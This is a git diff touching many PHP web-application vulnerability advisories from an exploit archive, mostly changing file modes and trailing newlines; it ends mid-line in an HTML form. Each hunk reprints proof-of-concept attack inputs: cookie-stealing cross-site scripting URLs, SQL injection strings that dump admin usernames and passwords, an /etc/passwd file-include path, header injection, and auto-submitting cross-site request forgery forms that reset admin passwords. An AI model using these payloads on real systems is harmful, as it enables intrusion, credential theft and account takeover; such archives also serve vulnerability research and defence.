a/platforms/php/webapps/34195.txt b/platforms/php/webapps/34195.txt old mode 100755 new mode 100644 index 1f9d4c2e5..20bafd8ef --- a/platforms/php/webapps/34195.txt +++ b/platforms/php/webapps/34195.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b -http://www.example.com/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader:test \ No newline at end of file +http://www.example.com/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader:test \ No newline at end of file diff --git a/platforms/php/webapps/34197.txt b/platforms/php/webapps/34197.txt old mode 100755 new mode 100644 index f61bf2569..7b4370cdb --- a/platforms/php/webapps/34197.txt +++ b/platforms/php/webapps/34197.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc AbleSpace 1.0 is vulnerable; other versions may be affected as well. -http://www.example.com/path/news.php?view=3(SQL) \ No newline at end of file +http://www.example.com/path/news.php?view=3(SQL) \ No newline at end of file diff --git a/platforms/php/webapps/34198.txt b/platforms/php/webapps/34198.txt old mode 100755 new mode 100644 index 4f1f8abd1..acc0617c1 --- a/platforms/php/webapps/34198.txt +++ b/platforms/php/webapps/34198.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Limny versions prior to 2.2 are vulnerable. -http://www.example.com/?q=user%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file +http://www.example.com/?q=user%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34204.html b/platforms/php/webapps/34204.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34207.txt b/platforms/php/webapps/34207.txt old mode 100755 new mode 100644 index a80dd56d1..03cd309b0 --- a/platforms/php/webapps/34207.txt +++ b/platforms/php/webapps/34207.txt @@ -4,4 +4,4 @@ Customer Paradigm PageDirector is prone to an SQL-injection vulnerability becaus Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?id=UniOn+AlL+SelEct+group_concat(username,0x3e,password)+from+admin-- \ No newline at end of file +http://www.example.com/index.php?id=UniOn+AlL+SelEct+group_concat(username,0x3e,password)+from+admin-- \ No newline at end of file diff --git a/platforms/php/webapps/34209.txt b/platforms/php/webapps/34209.txt old mode 100755 new mode 100644 index f956293b3..385115852 --- a/platforms/php/webapps/34209.txt +++ b/platforms/php/webapps/34209.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example data is available: Username: or\'1\'=\'1\' -Password: S.W.T \ No newline at end of file +Password: S.W.T \ No newline at end of file diff --git a/platforms/php/webapps/34210.txt b/platforms/php/webapps/34210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34211.html b/platforms/php/webapps/34211.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34212.html b/platforms/php/webapps/34212.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34213.txt b/platforms/php/webapps/34213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34214.txt b/platforms/php/webapps/34214.txt old mode 100755 new mode 100644 index 4168cdc79..eca40e9a3 --- a/platforms/php/webapps/34214.txt +++ b/platforms/php/webapps/34214.txt @@ -4,4 +4,4 @@ PHP Bible Search is prone to an SQL-injection vulnerability and a cross-site scr Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/bible.php?string=&book=2&chapter=[XSS] \ No newline at end of file +http://www.example.com/bible.php?string=&book=2&chapter=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34215.txt b/platforms/php/webapps/34215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34216.txt b/platforms/php/webapps/34216.txt old mode 100755 new mode 100644 index 288f24cf9..67864cd7b --- a/platforms/php/webapps/34216.txt +++ b/platforms/php/webapps/34216.txt @@ -4,4 +4,4 @@ eBay Clone Script 2010 is prone to an SQL-injection vulnerability because it fai Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/showcategory.php?cid=[sqli] \ No newline at end of file +http://www.example.com/showcategory.php?cid=[sqli] \ No newline at end of file diff --git a/platforms/php/webapps/34217.txt b/platforms/php/webapps/34217.txt old mode 100755 new mode 100644 index d81019f19..41d7f7c05 --- a/platforms/php/webapps/34217.txt +++ b/platforms/php/webapps/34217.txt @@ -4,4 +4,4 @@ Clix'N'Cash Clone 2010 is prone to an SQL-injection vulnerability because it fai Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?view=[sqli] \ No newline at end of file +http://www.example.com/index.php?view=[sqli] \ No newline at end of file diff --git a/platforms/php/webapps/34218.txt b/platforms/php/webapps/34218.txt old mode 100755 new mode 100644 index bb1227b87..a5ed40514 --- a/platforms/php/webapps/34218.txt +++ b/platforms/php/webapps/34218.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc V-EVA Classified Script 5.1 is vulnerable; other versions may also be affected. -http://www.example.com/classified_img.php?clsid=[SQLI] \ No newline at end of file +http://www.example.com/classified_img.php?clsid=[SQLI] \ No newline at end of file diff --git a/platforms/php/webapps/34219.txt b/platforms/php/webapps/34219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34220.txt b/platforms/php/webapps/34220.txt old mode 100755 new mode 100644 index f41931ec3..b3d99e5f1 --- a/platforms/php/webapps/34220.txt +++ b/platforms/php/webapps/34220.txt @@ -4,4 +4,4 @@ CANDID is prone to an SQL-injection vulnerability and a cross-site scripting vul Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/image/view.php?image_id=[XSS] \ No newline at end of file +http://www.example.com/image/view.php?image_id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34222.html b/platforms/php/webapps/34222.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34225.txt b/platforms/php/webapps/34225.txt old mode 100755 new mode 100644 index 3b986e107..6a33f8107 --- a/platforms/php/webapps/34225.txt +++ b/platforms/php/webapps/34225.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=' -http://www.example.com/precios.php3?marca=12' \ No newline at end of file +http://www.example.com/precios.php3?marca=12' \ No newline at end of file diff --git a/platforms/php/webapps/34226.txt b/platforms/php/webapps/34226.txt old mode 100755 new mode 100644 index 6436e736d..5bf41aaa2 --- a/platforms/php/webapps/34226.txt +++ b/platforms/php/webapps/34226.txt @@ -4,4 +4,4 @@ System CMS Contentia is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/news.php?id=[SQLi] \ No newline at end of file +http://www.example.com/news.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/34229.txt b/platforms/php/webapps/34229.txt old mode 100755 new mode 100644 index c540699a3..c8e7a4bb3 --- a/platforms/php/webapps/34229.txt +++ b/platforms/php/webapps/34229.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ArcademSX version 2.904 is vulnerable. -http://www.example.com/arcademsx/index.php?cat=[XSS] \ No newline at end of file +http://www.example.com/arcademsx/index.php?cat=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3423.txt b/platforms/php/webapps/3423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34231.txt b/platforms/php/webapps/34231.txt old mode 100755 new mode 100644 index 6ad67395c..d6a0de40d --- a/platforms/php/webapps/34231.txt +++ b/platforms/php/webapps/34231.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br LiveZilla 3.1.8.3 is vulnerable; other versions may be affected. -http://www.example.com/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E \ No newline at end of file +http://www.example.com/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34232.txt b/platforms/php/webapps/34232.txt old mode 100755 new mode 100644 index af1fe9066..3a9fb9dee --- a/platforms/php/webapps/34232.txt +++ b/platforms/php/webapps/34232.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica The following example URIs are available: http://www.example.com/index.php?q=[SQLI] -http://www.example.com/index.php?q=[XSS] \ No newline at end of file +http://www.example.com/index.php?q=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34234.txt b/platforms/php/webapps/34234.txt old mode 100755 new mode 100644 index 7433573cd..7caaee61c --- a/platforms/php/webapps/34234.txt +++ b/platforms/php/webapps/34234.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Flatnux 2010-06.09 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?mod=none_Search&find="><script>alert(1)</script> \ No newline at end of file +http://www.example.com/index.php?mod=none_Search&find="><script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/34235.txt b/platforms/php/webapps/34235.txt old mode 100755 new mode 100644 index f7f1d123c..e731608c8 --- a/platforms/php/webapps/34235.txt +++ b/platforms/php/webapps/34235.txt @@ -14,4 +14,4 @@ http://www.example.com/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E HTML Injection: -<div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div> \ No newline at end of file +<div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div> \ No newline at end of file diff --git a/platforms/php/webapps/34236.txt b/platforms/php/webapps/34236.txt old mode 100755 new mode 100644 index 45b0daf23..6632d3ed8 --- a/platforms/php/webapps/34236.txt +++ b/platforms/php/webapps/34236.txt @@ -4,4 +4,4 @@ ReCMS is prone to a directory-traversal vulnerability because it fails to suffic Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. -http://www.example.com/state.php?data=country&val=italia&users_lang=[DT] \ No newline at end of file +http://www.example.com/state.php?data=country&val=italia&users_lang=[DT] \ No newline at end of file diff --git a/platforms/php/webapps/34238.txt b/platforms/php/webapps/34238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34239.txt b/platforms/php/webapps/34239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34245.txt b/platforms/php/webapps/34245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34246.txt b/platforms/php/webapps/34246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34250.txt b/platforms/php/webapps/34250.txt old mode 100755 new mode 100644 index b1f2df144..4b5c2e689 --- a/platforms/php/webapps/34250.txt +++ b/platforms/php/webapps/34250.txt @@ -8,4 +8,4 @@ An attacker can exploit the local file-include vulnerability using directory-tra Canteen 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?option=com_canteen&controller=../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_canteen&controller=../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34252.txt b/platforms/php/webapps/34252.txt old mode 100755 new mode 100644 index 2402fefb8..8d76a89c2 --- a/platforms/php/webapps/34252.txt +++ b/platforms/php/webapps/34252.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow i-Net Solution Matrimonial Script 2.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/products/shaadi/alert.php?id=%3Cscript%3Ealert(/XSS/)%3C/script%3E \ No newline at end of file +http://www.example.com/products/shaadi/alert.php?id=%3Cscript%3Ealert(/XSS/)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34253.txt b/platforms/php/webapps/34253.txt old mode 100755 new mode 100644 index e6a50a42f..989650339 --- a/platforms/php/webapps/34253.txt +++ b/platforms/php/webapps/34253.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Orbis CMS 1.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34255.html b/platforms/php/webapps/34255.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34257.txt b/platforms/php/webapps/34257.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34258.txt b/platforms/php/webapps/34258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34259.txt b/platforms/php/webapps/34259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34260.txt b/platforms/php/webapps/34260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34265.txt b/platforms/php/webapps/34265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34266.txt b/platforms/php/webapps/34266.txt old mode 100755 new mode 100644 index 8ce960b07..da956ce53 --- a/platforms/php/webapps/34266.txt +++ b/platforms/php/webapps/34266.txt @@ -9,4 +9,4 @@ RunCms 2.1 is vulnerable; other versions may also be affected. The following example request is available: wget --user-agent=" -" http://www.example.com/modules/forum/check.php \ No newline at end of file +" http://www.example.com/modules/forum/check.php \ No newline at end of file diff --git a/platforms/php/webapps/34268.txt b/platforms/php/webapps/34268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34273.txt b/platforms/php/webapps/34273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34275.txt b/platforms/php/webapps/34275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34277.txt b/platforms/php/webapps/34277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3428.txt b/platforms/php/webapps/3428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34280.txt b/platforms/php/webapps/34280.txt old mode 100755 new mode 100644 index a2f142e5f..0117a164d --- a/platforms/php/webapps/34280.txt +++ b/platforms/php/webapps/34280.txt @@ -12,4 +12,4 @@ http://www.example.com/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29% http://www.example.com/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E -http://www.example.com/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup \ No newline at end of file +http://www.example.com/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup \ No newline at end of file diff --git a/platforms/php/webapps/34282.txt b/platforms/php/webapps/34282.txt old mode 100755 new mode 100644 index d3bef4c52..9bf6cfe3c --- a/platforms/php/webapps/34282.txt +++ b/platforms/php/webapps/34282.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Real Estate Manager 1.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?lang=[XSS] \ No newline at end of file +http://www.example.com/index.php?lang=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34283.txt b/platforms/php/webapps/34283.txt old mode 100755 new mode 100644 index f0e6ade6e..c49e5b7ee --- a/platforms/php/webapps/34283.txt +++ b/platforms/php/webapps/34283.txt @@ -4,4 +4,4 @@ Model Agency Manager is prone to a cross-site scripting vulnerability because it An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/search_process.php?searchtype="/><script>alert('XSS')</script> \ No newline at end of file +http://www.example.com/search_process.php?searchtype="/><script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/php/webapps/34284.txt b/platforms/php/webapps/34284.txt old mode 100755 new mode 100644 index 6f41e77fb..dd515365a --- a/platforms/php/webapps/34284.txt +++ b/platforms/php/webapps/34284.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow osCSS version 1.2.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin/currencies.php?page=1"><script>alert(document.cookie)</script>&cID=1 \ No newline at end of file +http://www.example.com/admin/currencies.php?page=1"><script>alert(document.cookie)</script>&cID=1 \ No newline at end of file diff --git a/platforms/php/webapps/34285.txt b/platforms/php/webapps/34285.txt old mode 100755 new mode 100644 index 6f7827ea4..e122ab979 --- a/platforms/php/webapps/34285.txt +++ b/platforms/php/webapps/34285.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ArticleMS 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/search/?a=search&q=PACKETDEATH&advanced=1&sortby=0&finddate=0&c[]=[XSS] \ No newline at end of file +http://www.example.com/search/?a=search&q=PACKETDEATH&advanced=1&sortby=0&finddate=0&c[]=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34286.txt b/platforms/php/webapps/34286.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34287.txt b/platforms/php/webapps/34287.txt old mode 100755 new mode 100644 index b49564258..a713a3261 --- a/platforms/php/webapps/34287.txt +++ b/platforms/php/webapps/34287.txt @@ -7,4 +7,4 @@ An attacker can exploit these issues to execute arbitrary commands within the co Yappa 3.1.2 is vulnerable; other versions may also be affected. http://www.example.com/yappa/yappa.php?thedir=[ command you ] -http://www.example.com/yappa/yappa.php?image=[ command you] \ No newline at end of file +http://www.example.com/yappa/yappa.php?image=[ command you] \ No newline at end of file diff --git a/platforms/php/webapps/34288.txt b/platforms/php/webapps/34288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34289.txt b/platforms/php/webapps/34289.txt old mode 100755 new mode 100644 index 6404d0532..ac600c014 --- a/platforms/php/webapps/34289.txt +++ b/platforms/php/webapps/34289.txt @@ -4,4 +4,4 @@ Web Cocoon simpleCMS is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/content/post/show.php?id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show \ No newline at end of file +http://www.example.com/content/post/show.php?id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show \ No newline at end of file diff --git a/platforms/php/webapps/34291.txt b/platforms/php/webapps/34291.txt old mode 100755 new mode 100644 index cd2704acc..d44a89f50 --- a/platforms/php/webapps/34291.txt +++ b/platforms/php/webapps/34291.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in The following example input is available: -">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> \ No newline at end of file +">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> \ No newline at end of file diff --git a/platforms/php/webapps/34292.txt b/platforms/php/webapps/34292.txt old mode 100755 new mode 100644 index ac898122e..9871c2718 --- a/platforms/php/webapps/34292.txt +++ b/platforms/php/webapps/34292.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/admin/edit_page.php?page=1[XSS] http://www.example.com/admin/edit_post.php?page=1[XSS] -http://www.example.com/admin/add_post.php?page=1[XSS] \ No newline at end of file +http://www.example.com/admin/add_post.php?page=1[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34294.txt b/platforms/php/webapps/34294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34295.txt b/platforms/php/webapps/34295.txt old mode 100755 new mode 100644 index 05c00a712..8a69bf1f7 --- a/platforms/php/webapps/34295.txt +++ b/platforms/php/webapps/34295.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow RunCms 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34296.txt b/platforms/php/webapps/34296.txt old mode 100755 new mode 100644 index 0b946a4e1..681654a54 --- a/platforms/php/webapps/34296.txt +++ b/platforms/php/webapps/34296.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CSSTidy 1.3 and ImpressCMS 1.2.1 are vulnerable; other versions may also be affected. -http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34302.txt b/platforms/php/webapps/34302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34308.txt b/platforms/php/webapps/34308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34315.txt b/platforms/php/webapps/34315.txt old mode 100755 new mode 100644 index 17d7ceacd..2bd4f31e0 --- a/platforms/php/webapps/34315.txt +++ b/platforms/php/webapps/34315.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The Next Generation of Genealogy Sitebuilding 7.1.2 is vulnerable. -http://www.example.com/searchform.php?msg="/><script>alert('XSS')</script> \ No newline at end of file +http://www.example.com/searchform.php?msg="/><script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/php/webapps/34317.txt b/platforms/php/webapps/34317.txt old mode 100755 new mode 100644 index 51d1fbe91..285b3413d --- a/platforms/php/webapps/34317.txt +++ b/platforms/php/webapps/34317.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Automne version 4.0.0rc2 is vulnerable; other versions may also be affected. -http://www.example.com/web/fr/228-recherche.php?q=<input type="Submit" name="Delete" value="ClickMe"onClick="alert(1)"> \ No newline at end of file +http://www.example.com/web/fr/228-recherche.php?q=<input type="Submit" name="Delete" value="ClickMe"onClick="alert(1)"> \ No newline at end of file diff --git a/platforms/php/webapps/34318.txt b/platforms/php/webapps/34318.txt old mode 100755 new mode 100644 index f4876d616..4c61cdbb7 --- a/platforms/php/webapps/34318.txt +++ b/platforms/php/webapps/34318.txt @@ -11,4 +11,4 @@ Zeecareers version 2.0 is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/basic_search_result.php?title=[XSS] \ No newline at end of file +http://www.example.com/basic_search_result.php?title=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34319.txt b/platforms/php/webapps/34319.txt old mode 100755 new mode 100644 index 066a0b60f..4a7317f63 --- a/platforms/php/webapps/34319.txt +++ b/platforms/php/webapps/34319.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The following example URI is available: -http://www.example.com/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script> \ No newline at end of file +http://www.example.com/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/34321.txt b/platforms/php/webapps/34321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34322.txt b/platforms/php/webapps/34322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34323.html b/platforms/php/webapps/34323.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34324.txt b/platforms/php/webapps/34324.txt old mode 100755 new mode 100644 index a4d32d35f..abf7dbff8 --- a/platforms/php/webapps/34324.txt +++ b/platforms/php/webapps/34324.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow FestOS version 2.3b is vulnerable; other versions may also be affected. -<form action="http://www.example.com/admin/do_snippets_edit.php?tabname=Pages" method="post" name="main" > <input type="hidden" name="snippetID" value="1" /> <input type="hidden" name="title" value="Site footer" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="contents" value='footer"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://www.example.com/admin/do_snippets_edit.php?tabname=Pages" method="post" name="main" > <input type="hidden" name="snippetID" value="1" /> <input type="hidden" name="title" value="Site footer" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="contents" value='footer"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34336.html b/platforms/php/webapps/34336.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34337.txt b/platforms/php/webapps/34337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34338.html b/platforms/php/webapps/34338.html old mode 100755 new mode 100644 index 35259a3b2..047be500a --- a/platforms/php/webapps/34338.html +++ b/platforms/php/webapps/34338.html @@ -32,5 +32,4 @@ document.getElementById(&#039;form_addedit_submit&#039;).click(); </form> <script> document.getElementById(&#039;form_addedit_submit&#039;).click(); -</script> - \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/php/webapps/34339.txt b/platforms/php/webapps/34339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34341.txt b/platforms/php/webapps/34341.txt old mode 100755 new mode 100644 index 8b571615b..d96e8946a --- a/platforms/php/webapps/34341.txt +++ b/platforms/php/webapps/34341.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to compromise the application, access or m WX-Guestbook version 1.1.208 is affected; other versions may also be affected. -test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* \ No newline at end of file +test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* \ No newline at end of file diff --git a/platforms/php/webapps/34342.txt b/platforms/php/webapps/34342.txt old mode 100755 new mode 100644 index 4dab478af..115ca560f --- a/platforms/php/webapps/34342.txt +++ b/platforms/php/webapps/34342.txt @@ -8,4 +8,4 @@ The following example URIs are available: http://www.example.com/eph/index.php?action=code&pid=[XSS] -http://www.example.com/eph/profile.php?action=view&uid=[XSS] \ No newline at end of file +http://www.example.com/eph/profile.php?action=view&uid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34349.txt b/platforms/php/webapps/34349.txt old mode 100755 new mode 100644 index eb259dd10..305a12ce7 --- a/platforms/php/webapps/34349.txt +++ b/platforms/php/webapps/34349.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Yacs CMS 10.5.27 is vulnerable; other versions may be affected. -http://www.example.com/index.php?context[path_to_root]= [inj3ct0r shell] \ No newline at end of file +http://www.example.com/index.php?context[path_to_root]= [inj3ct0r shell] \ No newline at end of file diff --git a/platforms/php/webapps/3435.txt b/platforms/php/webapps/3435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34350.txt b/platforms/php/webapps/34350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34351.html b/platforms/php/webapps/34351.html old mode 100755 new mode 100644 index f690969a7..17cffecc0 --- a/platforms/php/webapps/34351.html +++ b/platforms/php/webapps/34351.html @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code could run in the context of the affected eUploader PRO 3.1.1 is vulnerable; other versions may also be affected. -<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post"> <input type="hidden" name="id" value="[ID]"> <input type="hidden" name="admin_access" value="2"> <input type="hidden" name="email" value="my@email.com"> <input type="hidden" name="pass" value="hacked"> <input type="hidden" name="pass2" value="hacked"> <input type="submit" name="edit" value="Submit"> </form> \ No newline at end of file +<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post"> <input type="hidden" name="id" value="[ID]"> <input type="hidden" name="admin_access" value="2"> <input type="hidden" name="email" value="my@email.com"> <input type="hidden" name="pass" value="hacked"> <input type="hidden" name="pass2" value="hacked"> <input type="submit" name="edit" value="Submit"> </form> \ No newline at end of file diff --git a/platforms/php/webapps/34352.html b/platforms/php/webapps/34352.html old mode 100755 new mode 100644 index 759dcd7d6..f2e0ed89d --- a/platforms/php/webapps/34352.html +++ b/platforms/php/webapps/34352.html @@ -23,4 +23,4 @@ http://www.example.com/recipes/admin/banners.php?searchword="[XSS] http://www.example.com/recipes/admin/banners.php?numitem="[XSS] -<form action="http://www.example.com/recipes/update_profile.php" method="POST"> <input name="first_name" type="text" value="DEMO"> <input name="last_name" type="text" value="USER"> <input name="website" type="text" value="website.com"> <input name="country" type="text" value="Moon State"> <input name="email" type="text" value="our@email.com"> <input type="checkbox" name="subscribed" value="1"> <input type="submit" name="Submit" value="Update"> </form> <form action="http://www.example.com/recipes/admin/adminpass.php" method="POST"> <input type="password" name="AdminPass" value="hacked"> <input type="password" name="cAdminPass" value="hacked"> <input type="submit" name="submit" value="Update Password"> </form> <form action="http://www.example.com/recipes/admin/send_email_users.php" method="POST"> <input type="hidden" name="from_email" value="support@site.com"> <input type="hidden" name="subject" value="Subject"> <input type="hidden" name="message" value="Free your mind and the ass will follow!"> <input type="hidden" name="emailtype" value=""> <input type="submit" name="Submit" value="Send"> </form> \ No newline at end of file +<form action="http://www.example.com/recipes/update_profile.php" method="POST"> <input name="first_name" type="text" value="DEMO"> <input name="last_name" type="text" value="USER"> <input name="website" type="text" value="website.com"> <input name="country" type="text" value="Moon State"> <input name="email" type="text" value="our@email.com"> <input type="checkbox" name="subscribed" 